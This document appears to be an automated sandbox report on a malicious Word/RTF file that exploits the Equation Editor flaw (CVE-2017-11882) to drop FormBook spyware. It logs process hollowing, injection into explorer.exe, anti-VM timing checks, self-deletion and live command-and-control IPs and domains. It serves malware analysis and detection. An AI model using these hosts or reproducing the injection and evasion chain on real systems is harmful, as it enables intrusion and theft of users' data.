          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: dot.dotVirustotal: Detection: 43%
          Source: dot.dotReversingLabs: Detection: 33%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6705C562-0AE7-40EA-8474-F39DAB1813D0}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
          Source: Binary string: napstat.pdb source: vbc.exe, 00000005.00000003.2117075823.000000000050C000.00000004.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\Public\vbc.exeUnpacked PE file: 5.2.vbc.exe.400000.0.unpack .text:ER;.data:W;.fipuh:W;.wuta:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;
          Source: vbc[1].exe.2.drStatic PE information: section name: .fipuh
          Source: vbc[1].exe.2.drStatic PE information: section name: .wuta
          Source: vbc[1].exe.2.drStatic PE information: section name: .new
          Source: vbc.exe.2.drStatic PE information: section name: .fipuh
          Source: vbc.exe.2.drStatic PE information: section name: .wuta
          Source: vbc.exe.2.drStatic PE information: section name: .new
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002370D6 pushfd ; iretd 4_2_002370D9
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0023D921 pushfd ; ret 4_2_0023D928
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0023C955 push eax; ret 4_2_0023C9A8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0023C9A2 push eax; ret 4_2_0023C9A8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0023C9AB push eax; ret 4_2_0023CA12
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0023CA0C push eax; ret 4_2_0023CA12
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0022D32A push 00000064h; retf 4_2_0022D32C
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0023743D push esi; iretd 4_2_00237446
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002364CB push 0000000Dh; retf 4_2_002364CE
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00237516 pushfd ; iretd 4_2_0023752F
          Source: C:\Users\Public\vbc.exeCode function: 4_2_03ECE2D7 push ebx; iretd 4_2_03ECE4A7
          Source: C:\Users\Public\vbc.exeCode function: 4_2_03ECE4AD push ebx; iretd 4_2_03ECE4A7
          Source: C:\Users\Public\vbc.exeCode function: 4_2_03ECE46F push ebx; iretd 4_2_03ECE4A7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00415B36 pushfd ; iretd 5_2_00415B39
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C381 pushfd ; ret 5_2_0041C388
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3B5 push eax; ret 5_2_0041B408
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B46C push eax; ret 5_2_0041B472
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B402 push eax; ret 5_2_0041B408
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B40B push eax; ret 5_2_0041B472
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0040BD8A push 00000064h; retf 5_2_0040BD8C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00415E9D push esi; iretd 5_2_00415EA6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00415F76 pushfd ; iretd 5_2_00415F8F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00414F2B push 0000000Dh; retf 5_2_00414F2E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008EDFA1 push ecx; ret 5_2_008EDFB4
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00415B36 pushfd ; iretd 5_1_00415B39
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C381 pushfd ; ret 5_1_0041C388
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B3B5 push eax; ret 5_1_0041B408
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B46C push eax; ret 5_1_0041B472
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B402 push eax; ret 5_1_0041B408
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B40B push eax; ret 5_1_0041B472
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0040BD8A push 00000064h; retf 5_1_0040BD8C
          Source: initial sampleStatic PE information: section name: .text entropy: 7.49490680745
          Source: initial sampleStatic PE information: section name: .text entropy: 7.49490680745
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 000000000008897E second address: 0000000000088984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00229B80 rdtsc 4_2_00229B80
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2436Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2436Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE TID: 2864Thread sleep time: -48000s >= -30000sJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2856Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXELast function: Thread delayed
          Source: C:\Windows\SysWOW64\NAPSTAT.EXELast function: Thread delayed
          Source: explorer.exe, 00000006.00000000.2089261949.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2094952508.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.2094994772.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000006.00000000.2094952508.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.2089285245.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00229B80 rdtsc 4_2_00229B80
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B20 LdrLoadDll,5_2_00409B20
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00220042 push dword ptr fs:[00000030h]4_2_00220042
          Source: C:\Users\Public\vbc.exeCode function: 4_2_03EC8E2B push dword ptr fs:[00000030h]4_2_03EC8E2B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F26F8 mov eax, dword ptr fs:[00000030h]5_2_008F26F8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023526F8 mov eax, dword ptr fs:[00000030h]7_2_023526F8
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 45.142.156.44 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.xpddwrfj.icu
          Source: C:\Windows\explorer.exeDomain query: www.likehowto.com
          Source: C:\Windows\explorer.exeDomain query: www.pjsgsc.com
          Source: C:\Windows\explorer.exeNetwork Connect: 203.76.236.103 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.7985699.com
          Contains functionality to inject code into remote processesShow sources
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00220110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,ExitProcess,4_2_00220110
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388Jump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEThread register set: target process: 1388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: ED0000Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
          Source: explorer.exe, 00000006.00000000.2089393754.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 00000007.00000002.2377175053.0000000000F20000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.2089393754.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 00000007.00000002.2377175053.0000000000F20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2089261949.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.2089393754.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 00000007.00000002.2377175053.0000000000F20000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040B530 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_0040B530

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection712Masquerading111OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemorySecurity Software Discovery221Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer15Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection712Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing13Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383958 Sample: dot.dot Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 41 www.hcr.services 2->41 51 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 10 other signatures 2->57 11 EQNEDT32.EXE 12 2->11         started        16 WINWORD.EXE 336 22 2->16         started        18 EQNEDT32.EXE 2->18         started        signatures3 process4 dnsIp5 49 23.95.122.24, 49167, 80 AS-COLOCROSSINGUS United States 11->49 35 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 11->35 dropped 37 C:\Users\Public\vbc.exe, PE32 11->37 dropped 77 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->77 20 vbc.exe 11->20         started        39 C:\Users\user\Desktop\~$dot.dot, data 16->39 dropped file6 signatures7 process8 signatures9 59 Multi AV Scanner detection for dropped file 20->59 61 Detected unpacking (changes PE section rights) 20->61 63 Machine Learning detection for dropped file 20->63 65 3 other signatures 20->65 23 vbc.exe 20->23         started        process10 signatures11 67 Modifies the context of a thread in another process (thread injection) 23->67 69 Maps a DLL or memory area into another process 23->69 71 Sample uses process hollowing technique 23->71 73 Queues an APC in another process (thread injection) 23->73 26 explorer.exe 23->26 injected process12 dnsIp13 43 www.likehowto.com 203.76.236.103, 49168, 80 HENGTONG-IDC-LLCUS Hong Kong 26->43 45 k9cdna.51w4.com 45.142.156.44, 49169, 80 CNSERVERSUS United Kingdom 26->45 47 5 other IPs or domains 26->47 75 System process connects to network (likely due to code injection or exploit) 26->75 30 NAPSTAT.EXE 26->30         started        signatures14 process15 signatures16 79 Modifies the context of a thread in another process (thread injection) 30->79 81 Maps a DLL or memory area into another process 30->81 83 Tries to detect virtualization through RDTSC time measurements 30->83 33 cmd.exe 30->33         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          dot.dot43%VirustotalBrowse
          dot.dot33%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe42%ReversingLabsWin32.Spyware.Noon
          C:\Users\Public\vbc.exe42%ReversingLabsWin32.Spyware.Noon

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.NAPSTAT.EXE.2837960.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          7.2.NAPSTAT.EXE.5132e0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          5.1.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          k9cdna.51w4.com1%VirustotalBrowse
          www.likehowto.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
